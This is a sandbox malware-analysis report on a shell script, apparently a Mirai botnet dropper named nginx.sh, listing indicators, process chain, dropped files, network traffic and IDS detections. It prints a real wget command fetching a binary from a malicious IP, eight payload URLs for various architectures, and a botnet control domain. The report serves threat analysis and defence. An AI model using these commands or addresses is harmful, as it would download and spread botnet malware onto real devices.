File name: nginx.sh

Full analysis: https://app.any.run/tasks/a30fa9e1-4161-4b43-b682-ce3dd573f095
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Analysis date: August 22, 2024, 04:22:46
OS: Ubuntu 22.04.2
Tags: mirai, botnet, opendir
Indicators:
MIME: text/plain
File info: ASCII text
MD5: 484118C92B6491EE277ECE81F7556FDF
SHA1: 4AD9E314603A7633CB059647101B2196DFEC9D1D
SHA256: 6BB006FDF25AEED3B4724591B50738767F60426F4DF4C5DCF273D96E3F1714A5
SSDEEP: 12:XaV/ylVdOQaLQ88QylLQ62VQBgdslkZyYlHKSLrIlLTbYilC/XghBIlhT38xNI/7:BfX8zy2kg2el6RJUfL4NITrk6nKrs

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • MIRAI has been detected (SURICATA)

      • wget (PID: 12929)
  • SUSPICIOUS

    • Interacts with the Nginx web server

      • sh (PID: 12921)
      • bash (PID: 12926)
      • sudo (PID: 12922)
      • sudo (PID: 12925)
    • Executes commands using command-line interpreter

      • sudo (PID: 12925)
    • Modifies file or directory owner

      • sudo (PID: 12922)
    • Manipulating modules (likely to execute programs on system boot)

      • modprobe (PID: 12932)
      • modprobe (PID: 12938)
      • modprobe (PID: 12963)
      • modprobe (PID: 12951)
      • modprobe (PID: 12957)
      • modprobe (PID: 12969)
      • modprobe (PID: 12975)
    • Executes the "rm" command to delete files or directories

      • bash (PID: 12926)
    • Uses wget to download content

      • bash (PID: 12926)
    • Connects to the server without a host name

      • wget (PID: 12929)
      • wget (PID: 12948)
      • wget (PID: 12954)
      • wget (PID: 12960)
      • wget (PID: 12935)
      • wget (PID: 12941)
      • wget (PID: 12972)
      • wget (PID: 12978)
      • wget (PID: 12966)
    • Connects to unusual port

      • nginx.x86 (PID: 12945)
    • Potential Corporate Privacy Violation

      • wget (PID: 12948)
      • wget (PID: 12954)
      • wget (PID: 12929)
      • wget (PID: 12935)
      • wget (PID: 12941)
      • wget (PID: 12972)
      • wget (PID: 12960)
      • wget (PID: 12966)
    • Reads network configuration

      • bash (PID: 12926)
    • Gets active network interfaces

      • bash (PID: 12926)
  • INFO

    No info indicators.
No Malware configuration.
Total processes: 274
Monitored processes: 61
Malicious processes: 4
Suspicious processes: 8

Behavior graph

Process chain as flattened from the report's graph (the report marks the #MIRAI tag on the first wget; nodes without indicators are shown without a tag):

sh > sudo > chown > chmod > sudo > bash > locale-check > pkill > wget (#MIRAI) > chmod > bash > modprobe > rm > pkill > wget > chmod > bash > modprobe > rm > pkill > wget > chmod > nginx.x86 > rm > nginx.x86 > nginx.x86 > pkill > wget > chmod > bash > modprobe > rm > pkill > wget > chmod > bash > modprobe > rm > pkill > wget > chmod > bash > modprobe > rm > pkill > wget > chmod > bash > modprobe > rm > pkill > wget > chmod > bash > modprobe > rm > pkill > wget > chmod > bash > rm

Process information

The report lists the integrity level as UNKNOWN and no per-process indicators for every entry below.

12921  /bin/sh -c "sudo chown user /tmp/nginx\.sh && chmod +x /tmp/nginx\.sh && DISPLAY=:0 sudo -iu user /tmp/nginx\.sh "
       Path: /bin/sh | Parent: any-guest-agent | User: root | Exit code: 482

12922  sudo chown user /tmp/nginx.sh
       Path: /usr/bin/sudo | Parent: sh | User: root | Exit code: 0

12923  chown user /tmp/nginx.sh
       Path: /usr/bin/chown | Parent: sudo | User: root | Exit code: 0

12924  chmod +x /tmp/nginx.sh
       Path: /usr/bin/chmod | Parent: sh | User: root | Exit code: 0

12925  sudo -iu user /tmp/nginx.sh
       Path: /usr/bin/sudo | Parent: sh | User: root | Exit code: 482

12926  -bash --login -c \/tmp\/nginx\.sh
       Path: /bin/bash | Parent: sudo | User: user | Exit code: 482

12927  /usr/bin/locale-check C.UTF-8
       Path: /usr/bin/locale-check | Parent: bash | User: user | Exit code: 0

12928  pkill - 9 nginx.mips
       Path: /usr/bin/pkill | Parent: bash | User: user | Exit code: 0

12929  wget http://66.181.38.163/nginx.mips
       Path: /usr/bin/wget | Parent: bash | User: user | Exit code: 12926

12930  chmod +x nginx.mips
       Path: /usr/bin/chmod | Parent: bash | User: user | Exit code: 482
Executable files: 0
Suspicious files: 8
Text files: 0
Unknown types: 0

Dropped files

PID    Process  Filename                    Type
12929  wget     /tmp/nginx.mips (deleted)   o
12935  wget     /tmp/nginx.mpsl (deleted)   binary
12941  wget     /tmp/nginx.x86 (deleted)    o
12948  wget     /tmp/nginx.ppc              binary
12954  wget     /tmp/nginx.sparc            binary
12960  wget     /tmp/nginx.arm4             binary
12966  wget     /tmp/nginx.arm5 (deleted)   binary
12972  wget     /tmp/nginx.arm6 (deleted)   binary

The MD5 and SHA256 columns for the dropped files are empty in the report.
HTTP(S) requests: 10
TCP/UDP connections: 18
DNS requests: 11
Threats: 19

HTTP requests

The Type and Size columns are empty for every row in the report.

PID    Process  Method  HTTP Code  IP                  URL                                     CN       Reputation
-      -        GET     204        185.125.190.96:80   http://connectivity-check.ubuntu.com/   unknown  whitelisted
12929  wget     GET     200        66.181.38.163:80    http://66.181.38.163/nginx.mips         unknown  malicious
12935  wget     GET     200        66.181.38.163:80    http://66.181.38.163/nginx.mpsl         unknown  malicious
12941  wget     GET     200        66.181.38.163:80    http://66.181.38.163/nginx.x86          unknown  malicious
12948  wget     GET     200        66.181.38.163:80    http://66.181.38.163/nginx.ppc          unknown  malicious
12954  wget     GET     200        66.181.38.163:80    http://66.181.38.163/nginx.sparc        unknown  malicious
12960  wget     GET     200        66.181.38.163:80    http://66.181.38.163/nginx.arm4         unknown  malicious
12966  wget     GET     200        66.181.38.163:80    http://66.181.38.163/nginx.arm5         unknown  malicious
12972  wget     GET     200        66.181.38.163:80    http://66.181.38.163/nginx.arm6         unknown  malicious
12978  wget     GET     404        66.181.38.163:80    http://66.181.38.163/nginx.arm7         unknown  malicious

Connections

PID    Process       IP                   Domain                         ASN                      CN   Reputation
470    avahi-daemon  224.0.0.251:5353     -                              -                        -    unknown
-      -             185.125.190.96:80    connectivity-check.ubuntu.com  Canonical Group Limited  GB   unknown
12929  wget          66.181.38.163:80     -                              UNREAL-SERVERS           US   unknown
12935  wget          66.181.38.163:80     -                              UNREAL-SERVERS           US   unknown
12941  wget          66.181.38.163:80     -                              UNREAL-SERVERS           US   unknown
12945  nginx.x86     188.114.97.3:53378   bot.4567979.site               CLOUDFLARENET            NL   unknown
12948  wget          66.181.38.163:80     -                              UNREAL-SERVERS           US   unknown
12954  wget          66.181.38.163:80     -                              UNREAL-SERVERS           US   unknown
12960  wget          66.181.38.163:80     -                              UNREAL-SERVERS           US   unknown
12966  wget          66.181.38.163:80     -                              UNREAL-SERVERS           US   unknown

DNS requests

Domain, resolved IP(s), reputation:

connectivity-check.ubuntu.com
whitelisted
google.com: 142.250.185.142, 2a00:1450:4001:827::200e (whitelisted)
bot.4567979.site: 188.114.97.3, 188.114.96.3 (unknown)
26.100.168.192.in-addr.arpa: no address listed (unknown)
api.snapcraft.io: 185.125.188.55, 185.125.188.58, 185.125.188.59, 185.125.188.54 (whitelisted)

Threats

PID    Process  Class                                  Message
12929  wget     A Network Trojan was detected          AV INFO Possible Mirai .mips Executable Download
12929  wget     Potentially Bad Traffic                ET INFO MIPS File Download Request from IP Address
12929  wget     Potential Corporate Privacy Violation  ET POLICY Executable and linking format (ELF) file download Over HTTP
12935  wget     Potential Corporate Privacy Violation  ET POLICY Executable and linking format (ELF) file download Over HTTP
12941  wget     Potentially Bad Traffic                ET INFO x86 File Download Request from IP Address
12941  wget     Potentially Bad Traffic                ET HUNTING Suspicious GET Request for .x86
12941  wget     Potential Corporate Privacy Violation  ET POLICY Executable and linking format (ELF) file download Over HTTP
12948  wget     Potentially Bad Traffic                ET HUNTING Suspicious GET Request for .ppc File
12948  wget     Potential Corporate Privacy Violation  ET POLICY Executable and linking format (ELF) file download Over HTTP
12954  wget     Potentially Bad Traffic                ET INFO SPARC File Download Request from IP Address